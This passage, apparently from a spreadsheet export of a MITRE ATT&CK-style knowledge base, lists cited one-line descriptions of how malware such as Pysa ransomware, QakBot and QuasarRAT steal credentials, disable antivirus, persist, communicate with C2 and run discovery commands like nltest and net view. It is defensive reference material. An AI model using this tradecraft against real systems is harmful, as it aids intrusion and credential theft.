    <t>[Pysa](https://attack.mitre.org/software/S0583) has used brute force attempts against a central management console, as well as some Active Directory accounts.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has extracted credentials from the password database before encrypting the files.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the capability to stop antivirus services and disable Windows Defender.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has deleted batch files after execution. (Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has the functionality to delete shadow copies.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform OS credential dumping using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has executed a malicious executable by naming it svchost.exe.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced Port Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has used Powershell scripts to deploy its ransomware.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) has laterally moved using RDP connections.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) has used [PsExec](https://attack.mitre.org/software/S0029) to copy and execute the ransomware.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pysa](https://attack.mitre.org/software/S0583) can stop services and processes.(Citation: CERT-FR PYSA April 2020) </t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) can perform network reconnaissance using the Advanced IP Scanner tool.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) has a command to delete its Registry key and scheduled task.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) used the PowerShell filenames &lt;code&gt;Office365DCOMCheck.ps1&lt;/code&gt; and &lt;code&gt;SystemDiskClean.ps1&lt;/code&gt;.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) was likely obfuscated using Invoke-Obfuscation.(Citation: Unit 42 QUADAGENT July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses PowerShell scripts for execution.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) creates a scheduled task to maintain persistence on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) encodes C2 communications with base64.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the current domain the victim system belongs to.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) gathers the victim username.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses VBScripts.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses HTTPS and HTTP for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) uses cmd.exe to execute scripts and commands on the victim’s machine.(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[QakBot](https://attack.mitre.org/software/S0650) has the ability to enumerate windows on a compromised host.(Citation: ATT QakBot April 2021)
</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use large file sizes to evade detection.(Citation: Trend Micro Qakbot May 2020)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use advanced web injects to steal web banking credentials.(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can conduct brute force attacks to capture credentials.(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[QakBot](https://attack.mitre.org/software/S0650) can use signed loaders to evade detection.(Citation: ATT QakBot April 2021)
</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has collected usernames and passwords from Firefox and Chrome.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated.(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can deobfuscate and re-assemble code strings for execution.(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use domain generation algorithms in C2 communication.(Citation: Trend Micro Qakbot May 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can run &lt;code&gt;nltest /domain_trusts /all_trusts&lt;/code&gt; for domain trust discovery.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can send stolen information to C2 nodes including passwords, accounts, and emails.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can move laterally using worm-like functionality through exploitation of SMB.(Citation: Crowdstrike Qakbot October 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has a module that can proxy C2 communications.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can delete folders and files including overwriting its executable with legitimate programs.(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify whether it has been run previously on a host by checking for a specified folder.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can make small changes to itself in order to change its checksum and hash value.(Citation: Crowdstrike Qakbot October 2020)(Citation: Cyberint Qakbot May 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to download additional components and malware.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can measure the download speed on a targeted host.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) web inject module can inject Java Script into web banking pages visited by the victim.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can capture keystrokes on a compromised host.(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has stored stolen emails and other data into new folders prior to exfiltration.(Citation: Kroll Qakbot June 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can target and steal locally stored emails to support thread hijacking phishing campaigns.(Citation: Kroll Qakbot June 2020)
(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net localgroup&lt;/code&gt; to enable discovery of local groups.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has gained execution through users opening malicious attachments.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[QakBot](https://attack.mitre.org/software/S0650) has gained execution through users opening malicious links.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">The [QakBot](https://attack.mitre.org/software/S0650) payload has been disguised as a PNG file.(Citation: Group IB Ransomware September 2020) </t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can store its configuration information in a randomly named subkey under &lt;code&gt;HKCU\Software\Microsoft&lt;/code&gt;.(Citation: Red Canary Qbot)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use MSIExec to spawn multiple cmd.exe processes.(Citation: Crowdstrike Qakbot October 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;GetProcAddress&lt;/code&gt; to help delete malicious strings from memory.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net share&lt;/code&gt; to identify network shares for use in lateral movement.(Citation: Trend Micro Qakbot May 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability use TCP to send or receive C2 packets.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use obfuscated and encoded scripts; it has also hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.(Citation: Cyberint Qakbot May 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify peripheral devices on targeted systems.(Citation: Trend Micro Qakbot May 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use PowerShell to download and execute payloads.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to check running processes.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use process hollowing to execute its main payload.(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can inject itself into processes including explore.exe, Iexplore.exe, and Mobsync.exe.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can maintain persistence by creating an auto-run Registry key.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use Regsvr32 to execute malicious DLLs.(Citation: Red Canary Qbot)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify remote systems through the &lt;code&gt;net view&lt;/code&gt; command.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to use removable drives to spread through compromised networks.(Citation: Trend Micro Qakbot May 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use Rundll32.exe to enable C2 communication.(Citation: Crowdstrike Qakbot October 2020)(Citation: Red Canary Qbot)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to create scheduled tasks for persistence.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify the installed antivirus product on a targeted system.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can enumerate a list of installed programs.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can encrypt and pack malicious payloads.(Citation: Cyberint Qakbot May 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has spread through emails with malicious attachments.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Cyberint Qakbot May 2021)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[QakBot](https://attack.mitre.org/software/S0650) has spread through emails with malicious links.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)
</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can Base64 encode system information sent to C2.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to capture web session cookies.(Citation: Kroll Qakbot June 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can RC4 encrypt strings in C2 communication.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.(Citation: Trend Micro Qakbot May 2020)(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can collect system information including the OS version and domain on a compromised host.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net config workstation&lt;/code&gt;, &lt;code&gt;arp -a&lt;/code&gt;, and &lt;code&gt;ipconfig /all&lt;/code&gt; to gather network configuration information.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;netstat&lt;/code&gt; to enumerate current network connections.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify the user name on a compromised system.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can identify the system time on a targeted host.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>The [QakBot](https://attack.mitre.org/software/S0650) dropper can delay dropping the payload to evade detection.(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use VBS to download and execute malicious files.(Citation: Trend Micro Qakbot May 2020)
(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Cyberint Qakbot May 2021)(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) has the ability to use HTTP and HTTPS in communication with C2 servers.(Citation: Trend Micro Qakbot May 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can use cmd.exe to launch itself and to execute multiple C2 commands.(Citation: Crowdstrike Qakbot October 2020)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) can execute WMI queries to gather information.(Citation: Kaspersky QakBot September 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">
[QuasarRAT](https://attack.mitre.org/software/S0262) can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>A [QuasarRAT](https://attack.mitre.org/software/S0262) .dll file is digitally signed by a certificate from AirVPN.(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common FTP clients.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can obtain passwords from common web browsers.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can retrieve files from compromised client machines.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">
[QuasarRAT](https://attack.mitre.org/software/S0262) has the ability to set file attributes to "hidden" to hide files from the compromised user's view in Windows File Explorer.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A` though [QuasarRAT](https://attack.mitre.org/software/S0262) can only be run on Windows systems.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can download files to the victim’s machine and execute them.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a built-in keylogger.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a command to edit the Registry on the victim’s machine.(Citation: GitHub QuasarRAT)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can use TCP for C2 communication.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can use port 4782 on the compromised host for TCP callbacks.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can communicate over a reverse proxy using SOCKS5.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">If the [QuasarRAT](https://attack.mitre.org/software/S0262) client process does not have administrator privileges it will add a registry key to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` for persistence.(Citation: GitHub QuasarRAT)(Citation: CISA AR18-352A Quasar RAT December 2018) </t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has a module for performing remote desktop access.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.(Citation: Volexity Patchwork June 2018)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) uses AES with a hardcoded pre-shared key to encrypt network communication.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can gather system information from the victim’s machine including the OS type.(Citation: GitHub QuasarRAT)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can determine the country a victim host is located in.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) has the ability to enumerate the Wide Area Network (WAN) IP through requests to ip-api[.]com, freegeoip[.]net, or api[.]ipify[.]org observed with user-agent string `Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0`.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can enumerate the username and account type.(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can perform webcam viewing.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) can launch a remote shell to execute commands on the victim’s machine.(Citation: GitHub QuasarRAT)(Citation: CISA AR18-352A Quasar RAT December 2018)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can collect files from a compromised host.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[QuietSieve](https://attack.mitre.org/software/S0686) can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z.(Citation: Microsoft Actinium February 2022) </t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) has the ability to execute payloads in a hidden window.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can download and execute payloads on a target host.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can identify and search networked drives for specific file name extensions.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can identify and search removable drives for specific file name extensions.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\SymbolSourceSymbols\icons` or `Temp\ModeAuto\icons`.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) can use HTTPS in C2 communications.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>After decrypting itself in memory, [RARSTONE](https://attack.mitre.org/software/S0055) downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.(Citation: Camba RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) downloads its backdoor component from a C2 server and loads it directly into memory.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) uses SSL to encrypt its communication with its C2 server.(Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) performs a reflective DLL injection using a given pid.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uploads and downloads information.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>There is a variant of [RATANKBA](https://attack.mitre.org/software/S0241) that uses a PowerShell script instead of the traditional PE form.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) lists the system’s processes.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses the command &lt;code&gt;reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”&lt;/code&gt;.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;net view /domain&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers information about the OS architecture, OS name, and OS version/Service pack.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) gathers the victim’s IP address via the &lt;code&gt;ipconfig -all&lt;/code&gt; command.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;netstat -ano&lt;/code&gt; to search for specific IP address ranges.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; commands.(Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) uses &lt;code&gt;tasklist /svc&lt;/code&gt; to display running tasks.(Citation: RATANKBA)</t>
  </si>
